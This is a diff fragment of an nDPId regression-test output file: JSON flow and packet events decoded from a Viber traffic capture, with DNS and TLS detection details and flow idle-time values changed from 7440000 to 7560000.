00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":82,"source":"viber.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155641813,"flow_last_seen":1527155641813,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1527155641813,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":40445,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Viber","breed":"Acceptable","category":"Chat"},"dns": {"query":"dl-media.viber.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00625{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"viber.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1527155641840,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":185,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":185,"pkt_l4_len":151,"thread_ts_msec":1527155641840,"pkt":"MAdNo1+nAA6OMNv9CABFAACrXElAAEARXIjAqAAPwKgAEQA1nf0Al5UFl72BgAABAAUAAAAACGRsLW1lZGlhBXZpYmVyA2NvbQAAAQABwAwABQABAAAGHQAfDmQxZmplOWdtM2QwNXQ4CmNsb3VkZnJvbnQDbmV0AMAwAAEAAQAAADsABDbmXTXAMAABAAEAAAA7AAQ25l1swDAAAQABAAAAOwAENuZdn8AwAAEAAQAAADsABDbmXWM="} 00785{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":83,"source":"viber.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1527155641813,"flow_last_seen":1527155641840,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1527155641840,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":40445,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Viber","breed":"Acceptable","category":"Chat"},"dns": {"query":"dl-media.viber.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.230.93.53"}} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":84,"source":"viber.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155641845,"flow_last_seen":1527155641845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1527155641845,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.53","src_port":53934,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"viber.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1527155641845,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155641845,"pkt":"AA6OMNv9MAdNo1+nCABFAAA8nXxAAEAGSGvAqAARNuZdNdKuAbvV1v7mAAAAAKAC\/\/\/mSAAAAgQFtAQCCAoAIWOaAAAAAAEDAwc="} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"viber.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1527155641865,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155641865,"pkt":"MAdNo1+nAA6OMNv9CABFAAA8AABAAPQGMec25l01wKgAEQG70q53C5Ep1db+56AScSB9zAAAAgQFtAQCCAp+anCqACFjmgEDAwg="} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"viber.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1527155641867,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1527155641867,"pkt":"AA6OMNv9MAdNo1+nCABFAAA0nX1AAEAGSHLAqAARNuZdNdKuAbvV1v7ndwuRKoAQAq0bCAAAAQEICgAhY59+anCq"} -00847{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":87,"source":"viber.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1527155641845,"flow_last_seen":1527155641868,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":183,"flow_tot_l4_payload_len":183,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1527155641868,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.53","src_port":53934,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Viber","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dl-media.viber.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00904{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":89,"source":"viber.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1527155641845,"flow_last_seen":1527155641890,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1631,"flow_avg_l4_payload_len":271,"midstream":0,"thread_ts_msec":1527155641890,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.53","src_port":53934,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Viber","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dl-media.viber.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01167{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":91,"source":"viber.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1527155641845,"flow_last_seen":1527155641890,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4527,"flow_avg_l4_payload_len":565,"midstream":0,"thread_ts_msec":1527155641890,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.53","src_port":53934,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Viber","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dl-media.viber.com","server_names":"*.viber.com,viber.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=thawte, Inc., CN=thawte SSL CA - G2","subjectDN":"C=LU, ST=Luxembourg, L=Luxembourg, O=Viber Media Sarl, OU=IT, CN=*.viber.com","alpn":"h2,http\/1.1","fingerprint":"E1:11:26:E6:14:A5:E6:F7:F1:CB:68:D1:A6:95:A1:5E:11:48:72:2A"}} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":84,"source":"viber.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155641845,"flow_last_seen":1527155641845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1527155641845,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.53","src_port":53934,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"viber.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1527155641845,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155641845,"pkt":"AA6OMNv9MAdNo1+nCABFAAA8nXxAAEAGSGvAqAARNuZdNdKuAbvV1v7mAAAAAKAC\/\/\/mSAAAAgQFtAQCCAoAIWOaAAAAAAEDAwc="} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"viber.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1527155641865,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155641865,"pkt":"MAdNo1+nAA6OMNv9CABFAAA8AABAAPQGMec25l01wKgAEQG70q53C5Ep1db+56AScSB9zAAAAgQFtAQCCAp+anCqACFjmgEDAwg="} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"viber.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1527155641867,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1527155641867,"pkt":"AA6OMNv9MAdNo1+nCABFAAA0nX1AAEAGSHLAqAARNuZdNdKuAbvV1v7ndwuRKoAQAq0bCAAAAQEICgAhY59+anCq"} +00847{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":87,"source":"viber.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1527155641845,"flow_last_seen":1527155641868,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":183,"flow_tot_l4_payload_len":183,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1527155641868,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.53","src_port":53934,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Viber","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dl-media.viber.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00904{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":89,"source":"viber.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1527155641845,"flow_last_seen":1527155641890,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1631,"flow_avg_l4_payload_len":271,"midstream":0,"thread_ts_msec":1527155641890,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.53","src_port":53934,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Viber","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dl-media.viber.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01167{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":91,"source":"viber.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1527155641845,"flow_last_seen":1527155641890,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4527,"flow_avg_l4_payload_len":565,"midstream":0,"thread_ts_msec":1527155641890,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.53","src_port":53934,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Viber","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dl-media.viber.com","server_names":"*.viber.com,viber.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=thawte, Inc., CN=thawte SSL CA - G2","subjectDN":"C=LU, ST=Luxembourg, L=Luxembourg, O=Viber Media Sarl, OU=IT, CN=*.viber.com","alpn":"h2,http\/1.1","fingerprint":"E1:11:26:E6:14:A5:E6:F7:F1:CB:68:D1:A6:95:A1:5E:11:48:72:2A"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":119,"source":"viber.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155644240,"flow_last_seen":1527155644240,"flow_idle_time":180000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1527155644240,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"172.217.23.106","src_port":41993,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"viber.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1527155644240,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":65,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":65,"pkt_l4_len":31,"thread_ts_msec":1527155644240,"pkt":"AA6OMNv9MAdNo1+nCABFAAAzV0lAAEARXnTAqAARrNkXaqQJAbsAHwH3DO5PoOHayJNED10MJ0pTvsIOJQ7muOI="} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":120,"source":"viber.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1527155644243,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":65,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":65,"pkt_l4_len":31,"thread_ts_msec":1527155644243,"pkt":"AA6OMNv9MAdNo1+nCABFAAAzV0pAAEARXnPAqAARrNkXaqQJAbsAH4RqDO5PoOHayJNEEDIopLF1oa8UykhAnf8="} @@ -64,12 +64,12 @@ 00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":122,"source":"viber.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155646819,"flow_last_seen":1527155646819,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1527155646819,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":35331,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"app-measurement.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":123,"source":"viber.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1527155646840,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1527155646840,"pkt":"MAdNo1+nAA6OMNv9CABFAABRXJhAAEARXJPAqAAPwKgAEQA1igMAPcYV\/YeBgAABAAEAAAAAD2FwcC1tZWFzdXJlbWVudANjb20AAAEAAcAMAAEAAQAAASsABKzZF04="} 00784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":123,"source":"viber.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1527155646819,"flow_last_seen":1527155646840,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1527155646840,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":35331,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"app-measurement.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.23.78"}} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":124,"source":"viber.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155646850,"flow_last_seen":1527155646850,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1527155646850,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"172.217.23.78","src_port":43702,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":124,"source":"viber.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1527155646850,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155646850,"pkt":"AA6OMNv9MAdNo1+nCABFAAA8QKlAAEAGdTLAqAARrNkXTqq2Abu2kyjUAAAAAKAC\/\/\/OpwAAAgQFtAQCCAoAIWh9AAAAAAEDAwc="} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":125,"source":"viber.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1527155646851,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155646851,"pkt":"MAdNo1+nAA6OMNv9CABFAAA8SUEAADoGspqs2RdOwKgAEQG7qrbgrF\/UtpMo1aASpagYYgAAAgQFZAQCCAqjjizLACFofQEDAwg="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":126,"source":"viber.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1527155646855,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1527155646855,"pkt":"AA6OMNv9MAdNo1+nCABFAAA0QKpAAEAGdTnAqAARrNkXTqq2Abu2kyjV4Kxf1YAQAq3p2QAAAQEICgAhaH6jjizL"} -00848{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":127,"source":"viber.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1527155646850,"flow_last_seen":1527155646860,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1527155646860,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"172.217.23.78","src_port":43702,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"app-measurement.com","ja3":"3967ff2d2c9c4d144e7e30f24f4e9761","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} -00902{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":129,"source":"viber.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1527155646850,"flow_last_seen":1527155646862,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":679,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":1527155646862,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"172.217.23.78","src_port":43702,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"app-measurement.com","ja3":"3967ff2d2c9c4d144e7e30f24f4e9761","ja3s":"67619a80665d7ab92d1041b1d11f9164","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":124,"source":"viber.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155646850,"flow_last_seen":1527155646850,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1527155646850,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"172.217.23.78","src_port":43702,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":124,"source":"viber.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1527155646850,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155646850,"pkt":"AA6OMNv9MAdNo1+nCABFAAA8QKlAAEAGdTLAqAARrNkXTqq2Abu2kyjUAAAAAKAC\/\/\/OpwAAAgQFtAQCCAoAIWh9AAAAAAEDAwc="} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":125,"source":"viber.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1527155646851,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155646851,"pkt":"MAdNo1+nAA6OMNv9CABFAAA8SUEAADoGspqs2RdOwKgAEQG7qrbgrF\/UtpMo1aASpagYYgAAAgQFZAQCCAqjjizLACFofQEDAwg="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":126,"source":"viber.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1527155646855,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1527155646855,"pkt":"AA6OMNv9MAdNo1+nCABFAAA0QKpAAEAGdTnAqAARrNkXTqq2Abu2kyjV4Kxf1YAQAq3p2QAAAQEICgAhaH6jjizL"} +00848{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":127,"source":"viber.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1527155646850,"flow_last_seen":1527155646860,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1527155646860,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"172.217.23.78","src_port":43702,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"app-measurement.com","ja3":"3967ff2d2c9c4d144e7e30f24f4e9761","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} +00902{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":129,"source":"viber.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1527155646850,"flow_last_seen":1527155646862,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":679,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":1527155646862,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"172.217.23.78","src_port":43702,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"app-measurement.com","ja3":"3967ff2d2c9c4d144e7e30f24f4e9761","ja3s":"67619a80665d7ab92d1041b1d11f9164","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":136,"source":"viber.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155646968,"flow_last_seen":1527155646968,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1527155646968,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":136,"source":"viber.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1527155646968,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":103,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":103,"pkt_l4_len":69,"thread_ts_msec":1527155646968,"pkt":"AQBeAAD7MAdNo1+nCABFAABZHwxAAP8RutLAqAAR4AAA+xTpFOkARSvHAAQAAAACAAAAAAAACV84MDU3NDFDOQRfc3ViC19nb29nbGVjYXN0BF90Y3AFbG9jYWwAAAwAAcAbAAwAAQ=="} 00695{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":136,"source":"viber.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155646968,"flow_last_seen":1527155646968,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1527155646968,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_805741c9._sub._googlecast._tcp.local"}} @@ -83,16 +83,16 @@ 00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":210,"source":"viber.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155648481,"flow_last_seen":1527155648481,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1527155648481,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":44376,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"venetia.iad.appboy.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 